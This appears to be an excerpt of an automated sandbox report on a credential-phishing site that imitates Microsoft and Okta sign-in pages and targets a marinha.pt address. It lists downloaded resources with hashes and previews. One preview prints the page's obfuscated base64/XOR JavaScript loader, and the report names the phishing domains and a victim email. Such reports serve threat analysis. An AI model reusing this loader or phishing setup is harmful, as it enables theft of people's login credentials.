                                                                  Entropy (8bit):7.988666025644622
                                                                  Encrypted:false
                                                                  SSDEEP:768:lvJo4KciQZYjebVq19lKPtHAQ/l4rj2bqkiHShpeSUOR4OqWOgaU:lhH3rVq1PKP432tSSh4SUORHqWcU
                                                                  MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                                  SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                                  SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                                  SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/GDSherpa-regular.woff
                                                                  Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                  Category:downloaded
                                                                  Size (bytes):25216
                                                                  Entropy (8bit):7.947339442168474
                                                                  Encrypted:false
                                                                  SSDEEP:768:BTwdm3bbEPDrEQT87zOyJ0WsnoU+RBshw:64LQXEN7DJGSRBs
                                                                  MD5:F9A795E2270664A7A169C73B6D84A575
                                                                  SHA1:0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8
                                                                  SHA-256:D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
                                                                  SHA-512:E17C8D922F52C8AB36D9C0A7DC41D32735CF1680EA653056308C6D23255FDBE40B96C68F0E7F8B3B521B6ACB080CD825F94320364B0A70141606A4449D980517
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/ijgVJ29TdMQnivj8m6zho8fxyrYaNaNm1zHY45bGv8MS12206
                                                                  Preview:RIFFxb..WEBPVP8X....0...o.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.Y....'$H..xkD....oUS..[.uM....CwI.H#.H.t(..!J.AJ# .(........0.W.?D...g.6..u......}K5.>|....^..*2.....z..../.1..F..A...Vk..W.Wm?z....H+.;:...s..Z;....V.....Z.gm.......\>.}..-.....w...D.........+,K...#......._[L.[.]w1..[.l..8.....f..E...W....;....o.Q...T`.W.(..........;^........:.T..6......Yo..x.6..n.\A.5X.........J....2.O.)....0..zdL1.x.X..e?.eA.M%f.D..W.].A=6D.....w....>.*3|M.7....aEe&l.or.Tt^.*6li..lYz.HF.....2.\...U.tfQ.<ZlHB.G--....]T..h.L.U]...m....{..T{....~......K#
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                  Category:downloaded
                                                                  Size (bytes):43596
                                                                  Entropy (8bit):7.9952701440723475
                                                                  Encrypted:true
                                                                  SSDEEP:768:b0nfc/3Osy1fo0tBBFF/GGXfN2ZHKTBUwL+BR49qCow3Z3HuvJ5+xXtTgXHk6/:b0fU3OdhFF/xNOoZc49ow3Z3HO+xX1mf
                                                                  MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                  SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                  SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                  SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/GDSherpa-vf.woff2
                                                                  Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:HTML document, ASCII text, with very long lines (15949), with CRLF line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):20976
                                                                  Entropy (8bit):5.88695811120679
                                                                  Encrypted:false
                                                                  SSDEEP:384:DqAynUOl/Ja0H14tu2fNtIPBDyuKjUTerxVLaUtQXqby3Ody2lb2llrrflrrM:DqAVOl/U014tumNtIP1y+erxVLaz1+Eg
                                                                  MD5:D5E9AE30DDBD48306CD51CF188C5D3DF
                                                                  SHA1:E7508851DADC17EB8A56897A09A97D3C36579254
                                                                  SHA-256:6D3349CF8E11152600C4D1588B6579396AF93845C4E9590984D63F758A4DCE65
                                                                  SHA-512:2F8D3A5BBA0FBCCF8F92AC8EC8F101B65947E26D01EE9AC265215E63993F5CB01F4CBC86F0DECA8B552B318E9DED6F7B3EAE6D18A0207BC91DFB17AD0847A1FE
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt
                                                                  Preview:<script>..function BVrjRTDjBP(xTNgIEAVYO, kgwhcxHNTE) {..let RhdFUQSTNr = '';..xTNgIEAVYO = atob(xTNgIEAVYO);..let bLnuLOHqJB = kgwhcxHNTE.length;..for (let i = 0; i < xTNgIEAVYO.length; i++) {.. RhdFUQSTNr += String.fromCharCode(xTNgIEAVYO.charCodeAt(i) ^ kgwhcxHNTE.charCodeAt(i % bLnuLOHqJB));..}..return RhdFUQSTNr;..}..var KJTFGLezqS = BVrjRTDjBP(`SBUPGwg4IXEWJhdbTgEVPCUiX3tbBQMNBGY/IBAxBh9CCg4lejsUIREUFURSZmN/VXoZDwJHCzt3b1l7BwUeABE8a1xvaAcFHgARPHUiFzdJRAQdFTgma0p7FwICAxJmNj0KIRAAAAgTLXsyCjlbBwYIGWc5OAcnWwUeEBE8OnwPJ1tSQlhPeXoyFy0EEgNECzt7PAw6WgwfS190eiIGJh0WGFdsQlhbWScXFAUZFXZYWwsxA0YqHA8rITgKOlwHGAYDYHIwMg0TLStcCSw4PQsNLDQaCgh9ZgsyHh8FAQVTEg0YAjI8EQsNUyQgCyJtRyoBJwkqEik0NTMgGQ0mcSEYLSxMLyQNESo4AxMwDVMKCiYgPTMLBgIEPytZLhYTEA0sPBwzUw5lM1YdAQI0Jw0rPhcLDiNTXCUMJCAIVyxFPCs/GwMWGyYwLCwbIAgjJRgtJzolBSgGARYQAh03JwsNUyQgCyJtRyoBERcRZxdVNSNfGSAleDIYCBIdBF8/UQc4GxYNI1MeIAs7GxILZDolATsXEWYHEQ4jU1wlDA4+CyACRjw7XFEcEj0fMDMwGTM5AToYCCAYAzs7FyxnZQwYNyQBDTZ9PzUiOAIEBSgOEg0LCTYaNxwgKTsbEgwVEy8v
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                                  Category:downloaded
                                                                  Size (bytes):10796
                                                                  Entropy (8bit):7.946024875001343
                                                                  Encrypted:false
                                                                  SSDEEP:192:aPzBBDKs07GiH528urXXSjD4/voR3Euri/in9Q28oLaIAQLdCYXQIDeoIdv60:aPVBQ7P5nIyjD+oRnr4inJdANuGdC0
                                                                  MD5:12BDACC832185D0367ECC23FD24C86CE
                                                                  SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                                  SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                                  SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                                                  Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                  Category:downloaded
                                                                  Size (bytes):937
                                                                  Entropy (8bit):7.737931820487441
                                                                  Encrypted:false
                                                                  SSDEEP:24:2PUSIn/IylOgX9qCigRmHQxlCNebarFY9:2PLCHlOgXQ9Oie+rw
                                                                  MD5:FC3B7BBE7970F47579127561139060E2
                                                                  SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                                  SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                                  SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://developers.cloudflare.com/favicon.png
                                                                  Preview:.PNG........IHDR... ... .....szz.....pHYs...........~....[IDATX..KHTQ..g...&....!pY-.q.-B.H....Q`HY.wL.L....D....M.hS.H.w..wF..y|..s.9..2.6s..w.....}.9........m.{"."q.Q..x.ZO..h.U.y.3.].^.M. .0...D7L...D....w...a$}/u..)n....@......8.V.y6..X..U.QgA.\.Q.F..~.>..'......g.=.2..VW..\....`1d......q..........6...Y...L.g9....l.-...z.t.CE|...d5...b..H?....4...+.J.....9.E..-. ..R$.D.S....7...b..i..\q.?0..9....,d&...mw.L..&N.FpM"...;.......O[db/...-....Q<..WDhN.nu....%...m......A.S.._.>w...0.u..TJ...)......u..(=.!.."zTE0....J....ki#..n0..^.._"..D.....u..p.*=.&d..1....8...f.kR.3G6.t....Vcl.o=~/.$./...I.....$............(]...9.,...i....e... ..........._....@.h./......./U2Nd..........U..|...{.(...y....`.|....z\..z.@.o5...-...O.T.TL).5...y.m.......zZ........:..B..i..w...?!...m-xi.....;...e.0.A...W.}..E...u......h0O./...U..jA..., ..{.(......._=.w#.~..<..g.Vz....o@.e...........2.....T....IEND.B`.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                  Category:downloaded
                                                                  Size (bytes):93276
                                                                  Entropy (8bit):7.997636438159837
                                                                  Encrypted:true
                                                                  SSDEEP:1536:Dy7KSLv+MMqDeeIgDFSxpuQP7ObnKSWBO61LlRzSSAT6YmkSzOu7Be0OB53jIH4I:Dy7JD+net+puI7ObKHVhTSSlYmk4OuWa
                                                                  MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                  SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                  SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                  SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/GDSherpa-vf2.woff2
                                                                  Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:SVG Scalable Vector Graphics image
                                                                  Category:downloaded
                                                                  Size (bytes):2905
                                                                  Entropy (8bit):3.962263100945339
                                                                  Encrypted:false
                                                                  SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                                                                  MD5:FE87496CC7A44412F7893A72099C120A
                                                                  SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                  SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                  SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/yzDhxxcm7mbe0biUXnf7h5BSC0wgalccVUxATWopC0JTt9qZL8buLnc90180
                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (51734)
                                                                  Category:downloaded
                                                                  Size (bytes):222931
                                                                  Entropy (8bit):5.0213311632628725
                                                                  Encrypted:false
                                                                  SSDEEP:3072:Z4blthK0D4NIbkhhMW0AphsQyXV3oUHDDlxh/LoFdW:Z4vhK0D4NQlxh/LoFdW
                                                                  MD5:0329C939FCA7C78756B94FBCD95E322B
                                                                  SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                                  SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                                  SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                                  Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:downloaded
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:V:V
                                                                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://jygdt.tjezyf.ru/kella$z8ye07
                                                                  Preview:0
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                  Category:downloaded
                                                                  Size (bytes):644
                                                                  Entropy (8bit):4.6279651077789685
                                                                  Encrypted:false
                                                                  SSDEEP:12:EEasTzWl6/Kjsg9GXlxDfwyf+/11C1+/MguB/KQGXlxD3EZAGxtw006cNOBkP1HJ:PaPlKKVkz1f+tPUgo/KQGbEZAuwz65GH
                                                                  MD5:541B83C2195088043337E4353B6FD60D
                                                                  SHA1:F09630596B6713217984785A64F6EA83E91B49C5
                                                                  SHA-256:2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
                                                                  SHA-512:B2AE42BA9D3A63D3ACB179051B005F2589F147D94F044616AE5DC5705E873F16057C56934262841191263B4C35804EF188BD38CF69CCE0F4B2CF76C05F17B8AD
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/uvzWbq53F9oUBbZ6Pvast8uNBxSwpjYvpcHgRi4X34130
                                                                  Preview:RIFF|...WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHK....W`$....z..".Y..P}0;.PE..G..h....9.@..`..2.......=.T.....-3..ow.*...&......VP8 :...0....*....>m&.M.!"......i...O...(.........g....w...XG...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 130 x 42, 8-bit/color RGBA, non-interlaced
                                                                  Category:downloaded
                                                                  Size (bytes):4251
                                                                  Entropy (8bit):7.941594341289157
                                                                  Encrypted:false
                                                                  SSDEEP:96:2+cBbq/xspzsakZE7j/8FPqlAu0qlEUwNW6n2ycBt:2RdEG/qql30qTwj2ht
                                                                  MD5:DAA68C86DC366E7979BF23AA88BED9E2
                                                                  SHA1:AD1378BF8AF0498AD2CD3A93490EAFCE92424682
                                                                  SHA-256:0F4449669831E15DBCDEE8932A3D996DA913D9A60718157331426D454D660AE5
                                                                  SHA-512:DD825099D57BF2DA27119D74051A768E3237C76AD23EEFA1534BC1D63BFAFC8335A45AADF23362E1F90BCAF6E3B889FEC63E8EB50D683AF9FE8BC2217926191A
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://aadcdn.msauthimages.net/c1c6b6c8-oza7ewv53y3yvexbsc84eiyfwmickr2pstnkwdujq6s/logintenantbranding/0/bannerlogo?ts=636959481277037644
                                                                  Preview:.PNG........IHDR.......*......L.~....tEXtSoftware.Adobe ImageReadyq.e<...=IDATx..\.xT.^s..N2L2...!......H.p.K.......J.Z.... !.+^KA.a....(.j.J.".B..m.^....@..L...d2.....<..L..W.|..o}3g.=..9k...k.=.........'N..{.^.uuu.}.NX.b.T....q.i.*O.:5k.....foXX.x.^......m.N...2.....Nx...x..L&.....K`..x.......o,..AeU5tuu.L&.=...........Q.........^.9:.J.......c..U...^.jei...#.DG......3'N.}.....5.......|..V+..............f..q...P(...8.............I..8....c..^..?...@..C..~....-,.:l.....j...q.2..n.....C.>.p.R.......9LN.s..w.....lQ..w...!Ikkk(L.$.@D...a.rrr...w..m..8..Rd..FC.*e....rrr.l..__^q1.$..#....--0{....7o.....b..X.DDD...".p#...r.SO=.?s......._.H....w...N..V.y.g?y..y.m.p..A?j...B..f.m...g0...3.P.. ..r...#.H.c.C..cG..{7..Yo.X:|=.....RBbb...=..T_.9..q..4r......f...<.....\a.(..9.Fr.R......}t...'e'.........$.U.i......r./.x..[...f...J.f.....SX..cH....?.EZ) ..)".{.3.o{...&.SI...z...H Uf3.. {..K...p.|.QA.W..d..q..!.."..E'.<.3|...p...@...h..Tp.#c..2.d..zpVV.%;......HQVVV;qBf..`
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                  Category:downloaded
                                                                  Size (bytes):9648
                                                                  Entropy (8bit):7.9099172475143416
                                                                  Encrypted:false
                                                                  SSDEEP:192:gwTgBYruFELhYmwd93mjW0l9OsENOLWcXdN4CLrHZfTtjOZgYM5cWjAaP6:gwTgBxaYmo5mS0l9OsuOL3NNVLlfTtjE
                                                                  MD5:4946EB373B18D178C93D473489673BB6
                                                                  SHA1:16477ACB73B63CA251D37401249E7E4515FEBD24
                                                                  SHA-256:666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
                                                                  SHA-512:F684B90B748DC8399F76C5D8F94AF6C4E6869143F18D19CE435B25EAA14E9647B120467BDD0795895676DC0CCCDEABF82BEB2F46CE2C5BF4C58ED9C134F30C48
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/qrgnZWTorGwUDt4wh0nteDBlmP12NcjporrrNyuuep9wZWpw6ef236
                                                                  Preview:RIFF.%..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH......0....n.mu..G..t042.....@...`[...%...6....9AD.'@.,f.B...+..+..+..W&.p.....h.......f.-...+.....m...n....E....O].+R.&Q..#.X.ip4..p......\O...\/....9.5.a..DfZ,K....8.....Z..2..z......t.......|.I.(..6E.D.}.C..OQD$S}iZ...[D.......q`(...@../.NQ......+"b%.X.D".G.*...0G...".2........x.O......7......E..&....e.F..4...K>.M..Pd.B...@'o./te..[.f....4[..a..x...9#.@$.=...t..=..t_.W....[..f.|fv...N...c6..k4}.9.7.....f.F3.4[...a...;.m.@N.n.0.....n.G[c.H.}..t.{..;....G...2.::..].0....
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (26765), with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):26765
                                                                  Entropy (8bit):5.114987586674101
                                                                  Encrypted:false
                                                                  SSDEEP:768:wC8nBSz2omXX44PL5K9kdY8xbXoEYW+8SX:whnBSz2omXo4PL5K9kdY8xb+Ww
                                                                  MD5:1A862A89D5633FAC83D763886726740D
                                                                  SHA1:E5CE3AA454C992A13FD406A9647D7AFBF831051F
                                                                  SHA-256:5C22FD904EDB792331A7307DDF4A790E0D1318924F6D8E7362FA6B55D5AB6FBB
                                                                  SHA-512:3BFAB627DC0EBFAE1176098C870B4D2747518E7EA91646303276191A4A846D47B2E80BB1EE2FA67271130ECCBC8B1152778C99917FC6C63EA45A184BD673BF0D
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  URL:https://encryption-marinha.jkndfuzv.ru/348mXfXab6nFv46715
                                                                  Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_doc .pdfheader #pageName,#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}*{margin:0}.websitesections{height:100%;width:100vw;position:relative}#sections_doc,#sections_go
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                  Category:downloaded
                                                                  Size (bytes):17842
                                                                  Entropy (8bit):7.821645806304586
                                                                  Encrypted:false
